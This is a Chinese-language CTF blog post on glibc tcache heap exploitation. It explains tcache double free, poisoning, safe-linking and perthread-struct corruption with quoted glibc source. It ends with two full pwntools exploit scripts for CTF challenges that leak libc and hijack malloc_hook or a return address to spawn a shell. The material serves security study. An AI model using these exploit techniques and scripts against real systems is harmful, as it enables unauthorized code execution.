tcache bin 相关知识

Tcache机制

Tcache机制是libc2.26开始增加的，tcache bins是64个单链表结构的bins，每个bins最大存放7个对应大小的chunk，chunk的大小在64位中以16字节递增，从24到1032字节，在32位机器上以8字节递增，从12字节到512字节

与tcache bin相关的利用思路

double free

libc2.29以前

在libc2.29以前是没有对放入tcache bin中的chunk进行double free检查的，也就是说我们可以直接释放两次同一个堆块

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void main(){
    setbuf(stdin, 0);
    setbuf(stdout, 0);
    setbuf(stderr, 0);
    char* buf = malloc(0x10);
    free(buf);
    free(buf);
}

同一个堆块被释放进tcache bin中

libc2.29之后

libc2.29之后加入了key字段用于double free的检查

/*in malloc.c 2904*/
/* We overlay this structure on the user-data portion of a chunk when
   the chunk is stored in the per-thread cache.  */
typedef struct tcache_entry
{
  struct tcache_entry *next;
  /* This field exists to detect double frees.  */
  struct tcache_perthread_struct *key;
} tcache_entry;

/* There is one of these for each thread, which contains the
   per-thread cache (hence "tcache_perthread_struct").  Keeping
   overall size low is mildly important.  Note that COUNTS and ENTRIES
   are redundant (we could have just counted the linked list each
   time), this is for performance reasons.  */
typedef struct tcache_perthread_struct
{
  char counts[TCACHE_MAX_BINS];
  tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;

static __thread bool tcache_shutting_down = false;
static __thread tcache_perthread_struct *tcache = NULL;

/* Caller must ensure that we know tc_idx is valid and there's room
   for more chunks.  */
static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
  assert (tc_idx < TCACHE_MAX_BINS);

  /* Mark this chunk as "in the tcache" so the test in _int_free will
     detect a double free.  */
  e->key = tcache;
  e->next = tcache->entries[tc_idx];
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}

/* Caller must ensure that we know tc_idx is valid and there's
   available chunks to remove.  */
static __always_inline void *
tcache_get (size_t tc_idx)
{
  tcache_entry *e = tcache->entries[tc_idx];
  assert (tc_idx < TCACHE_MAX_BINS);
  assert (tcache->entries[tc_idx] > 0);
  tcache->entries[tc_idx] = e->next;
  --(tcache->counts[tc_idx]);
  e->key = NULL;
  return (void *) e;
}

在_int_free()函数中会判断即将释放的堆块是否存在key字段指向tcache的地址

/*in malloc.c 4197*/
/* This test succeeds on double free.  However, we don't 100%
	   trust it (it also matches random payload data at a 1 in
	   2^<size_t> chance), so verify it's not an unlikely
	   coincidence before aborting.  */
	if (__glibc_unlikely (e->key == tcache))
	  {
	    tcache_entry *tmp;
	    LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
	    for (tmp = tcache->entries[tc_idx];
		 tmp;
		 tmp = tmp->next)
	      if (tmp == e)
		malloc_printerr ("free(): double free detected in tcache 2");
	    /* If we get here, it was a coincidence.  We've wasted a
	       few cycles, but don't abort.  */
	  }

tcache poisoning

修改chunk的fd指针达到任意地址读写的目的，比fast bin attack更简单的是，tcache没有size字段的检查，也就是不需要伪造size字段

需要注意的是2.32加入下面宏定义对fd指针机进行异或操作

/* Safe-Linking:
   Use randomness from ASLR (mmap_base) to protect single-linked lists
   of Fast-Bins and TCache.  That is, mask the "next" pointers of the
   lists' chunks, and also perform allocation alignment checks on them.
   This mechanism reduces the risk of pointer hijacking, as was done with
   Safe-Unlinking in the double-linked lists of Small-Bins.
   It assumes a minimum page size of 4096 bytes (12 bits).  Systems with
   larger pages provide less entropy, although the pointer mangling
   still works.  */
#define PROTECT_PTR(pos, ptr) \
  ((__typeof (ptr)) ((((size_t) pos) >> 12) ^ ((size_t) ptr)))
#define REVEAL_PTR(ptr)  PROTECT_PTR (&ptr, ptr)

static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);

  /* Mark this chunk as "in the tcache" so the test in _int_free will
     detect a double free.  */
  e->key = tcache;

  e->next = PROTECT_PTR (&e->next, tcache->entries[tc_idx]);
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}

/* Caller must ensure that we know tc_idx is valid and there's
   available chunks to remove.  */
static __always_inline void *
tcache_get (size_t tc_idx)
{
  tcache_entry *e = tcache->entries[tc_idx];
  if (__glibc_unlikely (!aligned_OK (e)))
    malloc_printerr ("malloc(): unaligned tcache chunk detected");
  tcache->entries[tc_idx] = REVEAL_PTR (e->next);
  --(tcache->counts[tc_idx]);
  e->key = NULL;
  return (void *) e;
}

tcache_put和tcache_get分别用宏定义对fd进行的加密和解密，所以2.32开始伪造fd的时候需要进行相应的异或操作

leak libc

在2.23下我们可以直接释放一个属于unsorted bin大小的chunk用于泄露libc，有了tcache机制后，想要通过unsorted bin泄露libc的话就需要先填满对应tcache bin，再释放才能进入unsorted bin中，或者直接释放一个0x410大小的chunk(64位下)

tcache perthread corruption

如果可以分配到tcache_perthread_strcut，我们就可以改写所有tcache bin中的count位和对应bin中的地址，填满count位让我们泄露libc变得更轻松，改写对应地址能将任意地址链入链表中到达任意地址读写的目的

例题

VN2020 easyTHeap

libc2.27

程序分析

free之后指针没有置零，uaf，限制了free次数为3次

只能申请7个堆块，最大为0x100

利用思路

double free拿到tcache struct，将所有tcache的count位填满，再free一个unsorted bin大小的堆块即可泄露libc，至此free次数以用完
编辑tcache改几个链表头打malloc_hook即可

exp

from pwn import *
banary = "./pwn2"
elf = ELF(banary)
ip = 'node4.buuoj.cn'
port = 27435
local = 0
if local:
    io = process(banary)
else:
    io = remote(ip, port)
context.log_level = "debug"

def debug():
    gdb.attach(io)
    pause()

s = lambda data : io.send(data)
sl = lambda data : io.sendline(data)
sa = lambda text, data : io.sendafter(text, data)
sla = lambda text, data : io.sendlineafter(text, data)
r = lambda : io.recv()
ru = lambda text : io.recvuntil(text)
uu32 = lambda : u32(io.recvuntil(b"\x7f")[-4:].ljust(4, b'\x00'))
uu64 = lambda : u64(io.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))
ia = lambda : io.interactive()


def add(size):
    sla(b'choice: ', b'1')
    sla(b'size?', str(size))

def edit(idx, con):
    sla(b'choice: ', b'2')
    sla(b'idx?', str(idx))
    sla(b'content:', con)

def show(idx):
    sla(b'choice: ', b'3')
    sla(b'idx?', str(idx))

def delete(idx):
    sla(b'choice: ', b'4')
    sla(b'idx?', str(idx))

add(0x80)

delete(0)
delete(0)

show(0)
heap = u64(io.recv(6).ljust(8, b'\x00')) - 0x10 - 0x250
print(hex(heap))

add(0x80)   #1
edit(1, p64(heap + 0x10))
add(0x80)   #2
add(0x80)   #3 tcache
edit(3, b'a' * 0x40)

add(0x80)   #4
delete(0)
show(0)
malloc_hook = uu64() - 96 - 0x10
libcbase = malloc_hook - 0x3EBC30
print(hex(libcbase))
one = libcbase + 0x4f322
realloc = libcbase + 0x98C30
'''
0x4f2c5 execve("/bin/sh", rsp+0x40, environ)
constraints:
  rsp & 0xf == 0
  rcx == NULL

0x4f322 execve("/bin/sh", rsp+0x40, environ)
constraints:
  [rsp+0x40] == NULL

0x10a38c execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL
'''

edit(3, b'a' * 0x40 + p64(malloc_hook - 0x13) * 4)
add(0x40)   #5
edit(5, b'a' * 11+ p64(one) + p64(realloc + 8))
add(0x30)
ia()

ciscn2022 华东北赛区duck

2.34 uaf , 打environ泄露栈地址，覆盖返回地址为system(“/bin/sh”)

from pwn import *
banary = "./pwn"
libc = ELF("./libc.so.6")
elf = ELF(banary)
ip = '1.14.71.254'
port = 28060
local = 0
if local:
    io = process(banary)
else:
    io = remote(ip, port)
context.log_level = "debug"

def debug():
    gdb.attach(io)
    pause()

s = lambda data : io.send(data)
sl = lambda data : io.sendline(data)
sa = lambda text, data : io.sendafter(text, data)
sla = lambda text, data : io.sendlineafter(text, data)
r = lambda : io.recv()
ru = lambda text : io.recvuntil(text)
uu32 = lambda : u32(io.recvuntil(b"\x7f")[-4:].ljust(4, b'\x00'))
uu64 = lambda : u64(io.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))
ia = lambda : io.interactive()

def add():
    sla(b'Choice: ', b'1')

def delete(idx):
    sla(b'Choice: ', b'2')
    sla(b'Idx:', str(idx))

def show(idx):
    sla(b'Choice: ', b'3')
    sla(b'Idx:', str(idx))

def edit(idx, size, con):
    sla(b'Choice: ', b'4')
    sla(b'Idx:', str(idx))
    sla(b'Size:', str(size))
    sla(b'Content:', con)

for i in range(9):
    add()               #8

for i  in range(8):
    delete(i)

show(0)
ru(b'\n')
key = u64(io.recv(5).ljust(8, b'\x00'))
print(hex(key))
show(7)
ru(b'\n')
libcbase = uu64() - 96 - libc.sym['main_arena']
print(hex(libcbase))
sh = libcbase + 0x1B4689
pop_rdi = libcbase + 0x2daa2
environ = libcbase + libc.sym["environ"]
sys_addr = libcbase + libc.sym['system']

for i in range(5):
    add()               #13

edit(1, 8, p64(environ ^ key))
add()   #14
add()   #15 environ
show(15)
stack = uu64() - 0x150      #ret_addr
print(hex(stack))


delete(5)
delete(6)
edit(6, 8, p64(stack - 0x18 ^ key))

add() #16
add()   #17 ret_addr
edit(17, 0x30, b'a' * 0x18 + p64(pop_rdi) + p64(sh) + p64(sys_addr))
ia()

Leof's blog

tcache利用思路总结